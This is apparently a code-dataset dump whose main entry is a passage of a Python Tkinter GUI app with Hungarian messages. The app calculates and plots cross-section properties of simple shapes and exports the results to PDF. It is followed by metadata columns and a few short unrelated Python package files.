print("Egyenloszaru haromszog szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
phi = np.arctan(b/ (a/2))
c = np.sqrt((a/2)**2 + b**2)
print('phi: ' + str(phi*180/np.pi))
print('c: ' + str(c))
s1 = b
s2 = np.sqrt(a**2 + (c/2)**2 - 2*a*(c/2)*np.cos(phi))
s3 = s2
print('s2: ' + str(s2))
print('s3: ' + str(s3))
t1 = a/3
beta = np.arccos( ( (s2/3)**2 - (2*s3/3)**2 - (c/2)**2 ) / ( -2 * (2*s3/3) * (c/2) ) )
print('beta: ' + str(beta))
t2 = (2*s2/3)*np.sin(beta)
t3 =t2
print('t1: ' + str(t1))
print('t2: ' + str(t2))
print('t3: ' + str(t3))
# selecting the smallest
t_min = min(t1, t2, t3)
print('legkisebb: ' + str(t_min))
if 0 < t:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
if 0 < t >= t_min:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
print("Teglalap szamitas (egyenlore minden mas is)")
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
if 0 < t < a/2 and 0 < t < b/2:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
else:
if 0 < t >= a/2 and a == b:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
if 0 < t >= a/2 and 0 < t < b/2:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif 0 < t >= b/2 and 0 < t < a/2:
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif t >= a/2 and t >= b/2:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
t = 0
#self.sm.e2.config({"background": self.colors['entry_color']})
return vissza,t '''
def calculate(self, event=None):
for i in self.sm.indicators:
i.config(text="")
if not self.shape_builder_mode:
if self.sm.shape == "Rectangle":
vissza, t = self.get_entry(2)
if None in vissza:
return -1
self.values = Calc.Rectangle(*vissza[:2], t, *vissza[2:], rad = self.angle_unit == "rad")
self.sm.result0.config(text = "Keresztmetszeti jellemzők:")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"] # ez radián
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transformed")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notransformed")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kᵧ = " + str(round(self.values["Ky"], 4)) + " " + self.unit + "\u00B3")
elif self.sm.shape == "Circle":
vissza, t = self.get_entry(1)
if None in vissza:
return -1
self.values = Calc.Circle(vissza[0], t, *vissza[1:],rad = self.angle_unit == "rad")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"]
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transformed")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notransformed")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = Kᵧ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kₚ = " + str(round(self.values["Kp"], 4)) + " " + self.unit + "\u00B3")
elif self.sm.shape == "Ellipse":
vissza, t = self.get_entry(2)
if None in vissza:
return -1
self.values = Calc.Ellipse(*vissza[:2], t, *vissza[2:],rad = self.angle_unit == "rad")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"]
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transcoord")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notrans")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kᵧ = " + str(round(self.values["Ky"], 4)) + " " + self.unit + "\u00B3")
elif self.sm.shape == "Isosceles_triangle":
vissza, t = self.get_entry(2)
if None in vissza:
return -1
self.values = Calc.IsoscelesTriangle(*vissza[:2], t, *vissza[2:],rad = self.angle_unit == "rad")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"]
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transcoord")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notrans")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kᵧ = " + str(round(self.values["Ky"], 4)) + " " + self.unit + "\u00B3")
elif self.sm.shape == "Right_triangle":
vissza, t = self.get_entry(2)
if None in vissza:
return -1
self.values = Calc.RightTriangle(*vissza[:2], t, *vissza[2:],rad = self.angle_unit == "rad")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"]
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transcoord")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notrans")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kᵧ = " + str(round(self.values["Ky"], 4)) + " " + self.unit + "\u00B3")
else:
print("Hiba, az alakzat nem talalhato")
if self.transformed_coordinate_on.get() == False:
if self.sm.shape == "Circle":
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit)
plot_principal_axes(self, self.colors, self.ax, self.values["alpha"],self.angle_unit, self.transformed_coordinate_on.get(), self.sm.shape)
else:
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit, vissza[0], vissza[1], vissza[0])
plot_principal_axes(self, self.colors, self.ax, self.values["alpha"],self.angle_unit, self.transformed_coordinate_on.get(), self.sm.shape, vissza[0], vissza[1], vissza[0])
else:
u = float(self.sm.te1.get().replace(',','.'))
v = float(self.sm.te2.get().replace(',','.'))
rot = float(self.sm.te3.get().replace(',','.'))
if self.sm.shape == "Circle":
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit, calculated = True, u=u, v=v, rot=rot)
else:
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit, vissza[0], vissza[1], vissza[0], calculated = True, u=u, v=v, rot=rot)
def save_file(self):
if self.shape_builder_mode == False:
if self.sm.result4.cget("text") != "":
print('Alap mod mentes')
date=dt.datetime.now()
filename = "eredmenyek_" + f"{date:%y_%m_%d_%H_%M}"
f = asksaveasfile(initialfile = filename,
defaultextension=".pdf",filetypes=[("PDF Files","*.pdf"),("All files","*.*")])
if f is None:
return
if self.sm.shape == "Circle":
d = float(self.sm.controls[0]["entry"].get().replace(',','.'))
if self.transformed_coordinate_on.get() == True:
u = float(self.sm.te1.get().replace(',','.'))
v = float(self.sm.te2.get().replace(',','.'))
phi = float(self.sm.te3.get().replace(',','.'))
else:
u = 0
v = 0
phi = 0
else:
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
if self.transformed_coordinate_on.get() == True:
u = float(self.sm.te1.get().replace(',','.'))
v = float(self.sm.te2.get().replace(',','.'))
phi = float(self.sm.te3.get().replace(',','.'))
else:
u = 0
v = 0
phi = 0
if self.thickness_on.get() == True:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
else:
t = 0
# saving to pdf
pdf = FPDF()
pdf.add_page()
pdf.add_font('DejaVu', '', 'DejaVuSansCondensed.ttf', uni=True)
pdf.set_font('DejaVu', '', 12)
self.fig.patch.set_facecolor("#FFFFFF")
self.canvas.draw()
tempfig_path = str(os.getenv('LOCALAPPDATA')) + "\\Aream\\tempfig.png"
self.canvas.print_figure(tempfig_path, 250)
self.fig.patch.set_facecolor(self.colors["secondary_color"])
self.canvas.draw()
pdf.set_text_color(0,0,0)
if self.thickness_on.get() == True:
print('belep az agba')
im = Image.open(tempfig_path)
data = np.array(im)
if self.theme == "dark":
r1, g1, b1 = 51, 51, 51 # Original value
else:
r1, g1, b1 = 244, 242, 244 # Original value
r2, g2, b2 = 255, 255, 255 # Value that we want to replace it with
red, green, blue = data[:,:,0], data[:,:,1], data[:,:,2]
mask = (red == r1) & (green == g1) & (blue == b1)
data[:,:,:3][mask] = [r2, g2, b2]
im = Image.fromarray(data)
im.save(tempfig_path)
else:
print('nem lep be')
None
self.canvas.draw()
pdf.image(tempfig_path, x = 55, y = 15, w = 170, h = 0, type = 'PNG')
if self.sm.shape == "Circle":
pdf.cell(200, 10, txt = 'Az alakzat: ', ln = 1, align = 'L')
pdf.cell(200, 10, txt = self.sm.shape + ' (d = ' + str(round(d, 4)) + " " + self.unit + ', t = ' +
str(round(t, 4)) + " " + self.unit + ', u = ' + str(round(u, 4)) + " " + self.unit +
', v = ' + str(round(v, 4)) + " " + self.unit + ', \u03c6 = ' + str(round(phi, 4)) + " " + self.angle_unit +')' ,ln = 2, align = 'L')
else:
pdf.cell(200, 10, txt = 'Az alakzat: ', ln = 1, align = 'L')
pdf.cell(200, 10, txt = self.sm.shape + ' (a = ' + str(round(a, 4)) + " " + self.unit + ', b = ' + str(round(b, 4)) + " " + self.unit + ', t = ' +
str(round(t, 4)) + " " + self.unit + ', u = ' + str(round(u, 4)) + " " + self.unit +
', v = ' + str(round(v, 4)) + " " + self.unit + ', \u03c6 = ' + str(round(phi, 4)) + " " + self.angle_unit +')' , ln = 2, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = "Keresztmetszeti jellemzők:" , ln = 3, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sm.result1.cget("text") , ln = 4, align = 'L')
pdf.cell(200, 10, txt = self.sm.result2.cget("text"), ln = 5, align = 'L')
pdf.cell(200, 10, txt = self.sm.result3.cget("text"), ln = 6, align = 'L')
pdf.cell(200, 10, txt = self.sm.result4.cget("text"), ln = 7, align = 'L')
pdf.cell(200, 10, txt = self.sm.result5.cget("text"), ln = 8, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sm.result6.cget("text"), ln = 9, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sm.result7.cget("text"), ln = 10, align = 'L')
pdf.cell(200, 10, txt = self.sm.result8.cget("text"), ln = 11, align = 'L')
pdf.cell(200, 10, txt = self.sm.result9.cget("text"), ln = 12, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sm.result10.cget("text"), ln = 13, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sm.result11.cget("text"), ln = 14, align = 'L')
pdf.cell(200, 10, txt = self.sm.result12.cget("text"), ln = 15, align = 'L')
pdf.output(f.name, 'F')
pdf.close()
else:
error_window(self)
else:
if self.sb.result4.cget("text") != "":
print('Mentes shapebuilder')
date=dt.datetime.now()
filename = "eredmenyek_" + f"{date:%y_%m_%d_%H_%M}"
tempfig_path = str(os.getenv('LOCALAPPDATA')) + "\\Aream\\tempfig.png"
self.sb.configure(bg='#FFFFFF')
self.sb.visual_grid.delete_grid()
self.sb.update_idletasks()
x=root.winfo_rootx()+self.sb.winfo_x()
y=root.winfo_rooty()+self.sb.winfo_y()
x1=x+self.sb.winfo_width()
y1=y+self.sb.winfo_height()
ImageGrab.grab().crop((x,y,x1,y1)).save(tempfig_path)
self.sb.configure(bg=self.colors["secondary_color"])
self.sb.visual_grid.create_grid(self.sb.scale, self.sb.Xcenter, self.sb.Ycenter, self.sb.scale_factor)
self.sb.update_idletasks()
pdf = FPDF()
pdf.add_page()
pdf.add_font('DejaVu', '', 'DejaVuSansCondensed.ttf', uni=True)
pdf.set_font('DejaVu', '', 12)
f = asksaveasfile(initialfile = filename,
defaultextension=".pdf",filetypes=[("PDF Files","*.pdf"),("All files","*.*")])
if f is None:
return
pdf.image(tempfig_path, x = 15, y = 5, w = 180, h = 0, type = 'PNG')
pdf.image('cover.png', x = 0, y = 0, w = 35, h = 60, type = 'PNG') # top-left
pdf.image('cover.png', x = 180, y = 0, w = 50, h = 0, type = 'PNG') # top-right
pdf.image('cover.png', x = 0, y = 80, w = 25, h = 60, type = 'PNG') # bottom-left
pdf.image('cover.png', x = 175, y = 80, w = 50, h = 0, type = 'PNG') # bottom-right
pdf.set_y(120)
pdf.cell(200, 10, txt = 'Saját alakzat:', ln = 20, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sb.result1.cget("text") , ln = 2, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sb.result2.cget("text"), ln = 3, align = 'L')
pdf.cell(200, 10, txt = self.sb.result3.cget("text"), ln = 4, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sb.result4.cget("text"), ln = 5, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sb.result5.cget("text"), ln = 6, align = 'L')
pdf.cell(200, 10, txt = self.sb.result6.cget("text"), ln = 7, align = 'L')
pdf.cell(200, 10, txt = self.sb.result7.cget("text"), ln = 8, align = 'L')
pdf.cell(200, 10, txt = self.sb.result8.cget("text"), ln = 9, align = 'L')
pdf.cell(200, 10, txt = self.sb.result9.cget("text"), ln = 10, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sb.result10.cget("text"), ln = 11, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sb.result11.cget("text"), ln = 12, align = 'L')
pdf.cell(200, 10, txt = self.sb.result12.cget("text"), ln = 13, align = 'L')
pdf.cell(200, 10, txt = self.sb.result13.cget("text"), ln = 14, align = 'L')
pdf.output(f.name, 'F')
pdf.close()
else:
error_window(self)
def doNothing(self):
print("Ez a funkció jelenleg nem elérhető...")
# VARIABLES ---------------------------------------------------------------------------------------------------------------------------------------------
DARK_THEME = {
'main_color': '#1a1a1a',
'secondary_color': '#333333',
'text_color': '#cccccc',
'entry_color': '#262626',
'disabled_color':'#333333',
'error_color':'red',
'draw_main': '#87aade',
'draw_secondary': '#1a1a1a',
'draw_tertiary': 'grey',
'draw_principal': 'red',
'sb_draw':'#87aade',
'sb_draw_2nd':'#008080',
'sb_selected':'',
'sb_error':'',
'sb_negative':'',
'sb_grid':'#3f3f3f',
'path': 'figures/dark_theme/'
}
LIGHT_THEME = {
'main_color': '#d9dcdf',
'secondary_color': '#f4f2f4',
'text_color': '#333333',
'entry_color': '#d9dcdf',
'disabled_color':'#f4f2f4',
'error_color':'red',
'draw_main': '#a4ade9',
'draw_secondary': '#000000',
'draw_tertiary': '#4d4d4d',
'draw_principal': 'red',
'sb_draw':'#a4ade9',
'sb_draw_2nd':'#5d93d1',
'sb_selected':'',
'sb_error':'',
'sb_negative':'',
'sb_grid':'#c4c4c4',
'path': 'figures/light_theme/'
}
# CALL THE WINDOW ---------------------------------------------------------------------------------------------------------------------------------------
if __name__ == "__main__":
# Load settings from JSON file
settings_path = str(os.getenv('LOCALAPPDATA')) + "\\Aream\\app_settings.json"
print(settings_path)
try:
with open(settings_path) as f:
settings = json.load(f)
except:
print("404 app_settings.json not found")
settings_dir = str(os.getenv('LOCALAPPDATA')) + "\\Aream"
os.mkdir(settings_dir)
settings={'theme':'dark', 'default_unit':'mm', 'angle_unit':'rad', 'logo_enabled':'True'}
if settings['logo_enabled'] == 'True':
master = starting_window()
master.mainloop()
root = main_window()
root.mainloop()
with open(settings_path, 'w') as json_file:
json.dump({'theme':root.theme, 'default_unit':root.unit, 'angle_unit':root.angle_unit, 'logo_enabled':root.logo_enabled}, json_file)
| 53.360581
| 266
| 0.496256
| 8,043
| 69,849
| 4.214224
| 0.070496
| 0.066381
| 0.046674
| 0.053695
| 0.803068
| 0.768166
| 0.737601
| 0.721286
| 0.709574
| 0.684142
| 0
| 0.032616
| 0.328852
| 69,849
| 1,309
| 267
| 53.360581
| 0.690309
| 0.039943
| 0
| 0.56448
| 0
| 0.002262
| 0.124021
| 0.015899
| 0
| 0
| 0
| 0.000764
| 0
| 1
| 0.014706
| false
| 0
| 0.029412
| 0
| 0.057692
| 0.065611
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a4ca2a9590068fa530208f24cef4cee33b604d59
| 74
|
py
|
Python
|
refinery/__init__.py
|
nkryptic/django-refinery
|
142db49676a32e478fbdc7b5c8c13ac5bbb83beb
|
[
"BSD-3-Clause"
] | 3
|
2015-08-29T00:13:57.000Z
|
2017-12-20T11:45:24.000Z
|
refinery/__init__.py
|
nkryptic/django-refinery
|
142db49676a32e478fbdc7b5c8c13ac5bbb83beb
|
[
"BSD-3-Clause"
] | 3
|
2020-02-12T01:16:48.000Z
|
2021-06-10T20:37:32.000Z
|
refinery/__init__.py
|
nkryptic/django-refinery
|
142db49676a32e478fbdc7b5c8c13ac5bbb83beb
|
[
"BSD-3-Clause"
] | null | null | null |
from refinery.filtertool import FilterTool
from refinery.filters import *
| 24.666667
| 42
| 0.851351
| 9
| 74
| 7
| 0.555556
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 74
| 2
| 43
| 37
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a4d5d92bafd6ef805d5a31eb940ce4187fc210f0
| 240
|
py
|
Python
|
crawler/error/urlerror.py
|
DallasLJ/spider
|
53807439d4e8c3b63b8ff7f4b7d99109daf19a02
|
[
"Apache-2.0"
] | null | null | null |
crawler/error/urlerror.py
|
DallasLJ/spider
|
53807439d4e8c3b63b8ff7f4b7d99109daf19a02
|
[
"Apache-2.0"
] | null | null | null |
crawler/error/urlerror.py
|
DallasLJ/spider
|
53807439d4e8c3b63b8ff7f4b7d99109daf19a02
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
class Error(Exception):
pass
class DomainUrlError(Error):
def __init__(self, message):
self.message = message
class SpiderError(Error):
def __init__(self, message):
self.message = message
| 16
| 32
| 0.670833
| 27
| 240
| 5.666667
| 0.481481
| 0.287582
| 0.156863
| 0.20915
| 0.535948
| 0.535948
| 0.535948
| 0.535948
| 0
| 0
| 0
| 0.005348
| 0.220833
| 240
| 14
| 33
| 17.142857
| 0.812834
| 0.070833
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.125
| 0
| 0
| 0.625
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
a4da01cd80dcbd7361278b7b5ad277575ff24a8e
| 235
|
py
|
Python
|
thola_client/api/__init__.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | 1
|
2021-12-28T18:53:52.000Z
|
2021-12-28T18:53:52.000Z
|
thola_client/api/__init__.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | null | null | null |
thola_client/api/__init__.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import absolute_import
# flake8: noqa
